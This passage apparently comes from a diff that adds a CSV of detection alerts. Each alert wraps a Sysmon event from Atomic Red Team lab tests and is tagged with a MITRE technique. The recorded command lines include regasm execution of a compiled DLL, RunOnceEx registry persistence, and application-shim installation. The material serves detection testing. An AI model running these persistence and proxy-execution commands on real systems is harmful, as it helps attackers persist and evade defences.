+    <Data Name=""ProcessGuid"">747F3D96-D7A4-5D31-0000-0010C9C22900</Data>
+    <Data Name=""ProcessId"">6804</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;del T1121.dll&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:55.681219Z"">
+    </TimeCreated>
+    <EventRecordID>3613</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:55.672</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-001081B22900</Data>
+    <Data Name=""ProcessId"">5800</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:52:25.933892Z"">
+    </TimeCreated>
+    <EventRecordID>1966429</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:52:25.853</Data>
+    <Data Name=""ProcessGuid"">365ABB72-5689-5C91-0000-0010543F0800</Data>
+    <Data Name=""ProcessId"">3896</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:55.105804Z"">
+    </TimeCreated>
+    <EventRecordID>3611</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:55.057</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010F2A42900</Data>
+    <Data Name=""ProcessId"">4784</Data>
+    <Data Name=""Image"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</Data>
+    <Data Name=""FileVersion"">4.7.3190.0 built by: NET472REL1LAST_C</Data>
+    <Data Name=""Description"">Visual C# Command Line Compiler</Data>
+    <Data Name=""Product"">Microsoft® .NET Framework</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
+    <Data Name=""ParentProcessId"">6748</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot; ) contain suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:55.034352Z"">
+    </TimeCreated>
+    <EventRecordID>3610</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:55.023</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
+    <Data Name=""ProcessId"">6748</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:55.034352Z"">
+    </TimeCreated>
+    <EventRecordID>3610</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:55.023</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
+    <Data Name=""ProcessId"">6748</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:49:45.162715Z"">
+    </TimeCreated>
+    <EventRecordID>1966423</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:49:45.052</Data>
+    <Data Name=""ProcessGuid"">365ABB72-55E9-5C91-0000-00102EEB0700</Data>
+    <Data Name=""ProcessId"">2104</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:06.267992Z"">
+    </TimeCreated>
+    <EventRecordID>3606</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:06.251</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-00107CF02800</Data>
+    <Data Name=""ProcessId"">324</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:06.196458Z"">
+    </TimeCreated>
+    <EventRecordID>3603</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:06.180</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-001031EB2800</Data>
+    <Data Name=""ProcessId"">6472</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d &quot; C:\Path\AtomicRedTeam.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:06.075725Z"">
+    </TimeCreated>
+    <EventRecordID>3600</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:06.056</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-0010BEE52800</Data>
+    <Data Name=""ProcessId"">3216</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d &quot; C:\Path\AtomicRedTeam.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
